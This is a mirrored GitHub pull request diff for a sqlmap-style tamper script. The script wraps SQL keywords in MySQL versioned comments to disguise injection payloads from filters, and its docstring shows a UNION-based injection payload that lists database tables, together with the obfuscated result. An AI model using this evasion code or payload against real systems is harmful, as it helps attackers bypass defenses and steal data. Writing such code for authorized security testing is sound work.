Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Add new tamper script 'mysqlversioncomment.py' #5923

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
pinoyvendetta wants to merge 3 commits into
base: master
Choose a base branch
from
+99 −0
Open

Add new tamper script 'mysqlversioncomment.py' #5923

Changes from 1 commit
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
fe134d6
Create mysqlversioncomment.py
pinoyvendetta Jul 1, 2025
d09fe4e
Update mysqlversioncomment.py
pinoyvendetta Jul 1, 2025
f596ede
Update mysqlversioncomment.py
pinoyvendetta Jul 25, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Prev Previous commit
Update mysqlversioncomment.py
  • Loading branch information
@pinoyvendetta
pinoyvendetta committed Jul 25, 2025
commit f596ede3e104de9426327d1228cfc4eb7b0a86fd
25 changes: 16 additions & 9 deletions tamper/mysqlversioncomment.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,9 @@
__priority__ = PRIORITY.NORMAL

def dependencies():
"""
This tamper script does not have any dependencies.
"""
pass

def tamper(payload, **kwargs):
Expand All @@ -33,7 +36,9 @@ def tamper(payload, **kwargs):
>>> tamper("1 AND 1=1 UNION ALL SELECT 1,GROUP_CONCAT(table_name),3 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()")
'1 AND 1=1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ 1,/*!50000GROUP_CONCAT*/(/*!50000table_name*/),3 /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/=/*!50000database()*/'
"""

keywords = {
# DML & DDL
"SELECT": "/*!50000SELECT*/",
"UNION": "/*!50000UNION*/",
"INSERT": "/*!50000INSERT*/",
Expand All @@ -46,11 +51,15 @@ def tamper(payload, **kwargs):
"LIMIT": "/*!50000LIMIT*/",
"ALL": "/*!50000ALL*/",
"DISTINCT": "/*!50000DISTINCT*/",

# Information Schema
"INFORMATION_SCHEMA.TABLES": "/*!50000INFORMATION_SCHEMA.TABLES*/",
"INFORMATION_SCHEMA.COLUMNS": "/*!50000INFORMATION_SCHEMA.COLUMNS*/",
"TABLE_NAME": "/*!50000TABLE_NAME*/",
"COLUMN_NAME": "/*!50000COLUMN_NAME*/",
"TABLE_SCHEMA": "/*!50000TABLE_SCHEMA*/",

# Functions
"CONCAT": "/*!50000CONCAT*/",
"CONCAT_WS": "/*!50000CONCAT_WS*/",
"GROUP_CONCAT": "/*!50000GROUP_CONCAT*/",
Expand All @@ -62,13 +71,17 @@ def tamper(payload, **kwargs):
"ORD": "/*!50000ORD*/",
"BENCHMARK": "/*!50000BENCHMARK*/",
"SLEEP": "/*!50000SLEEP*/",

# System Information Functions
"DATABASE()": "/*!50000DATABASE()*/",
"USER()": "/*!50000USER()*/",
"SESSION_USER()": "/*!50000SESSION_USER()*/",
"SYSTEM_USER()": "/*!50000SYSTEM_USER()*/",
"VERSION()": "/*!50000VERSION()*/",
"@@VERSION": "/*!50000@@VERSION*/",
"@@HOSTNAME": "/*!50000@@HOSTNAME*/",

# Other keywords
"SEPARATOR": "/*!50000SEPARATOR*/",
"HAVING": "/*!50000HAVING*/",
"INTO": "/*!50000INTO*/",
Expand All @@ -80,13 +93,7 @@ def tamper(payload, **kwargs):
ret_val = payload

if payload:
sorted_keywords = sorted(keywords.keys(), key=len, reverse=True)

for keyword in sorted_keywords:
if "()" in keyword:
regex_keyword = re.escape(keyword)
ret_val = re.sub(r"(?i)\b%s\b" % regex_keyword, keywords[keyword], ret_val)
else:
ret_val = re.sub(r"(?i)\b%s\b" % re.escape(keyword), keywords[keyword], ret_val)
for keyword in keywords:
ret_val = re.sub(r"(?i)(?<!\w)%s(?!\w)" % re.escape(keyword), keywords[keyword], ret_val)

return ret_val
return ret_val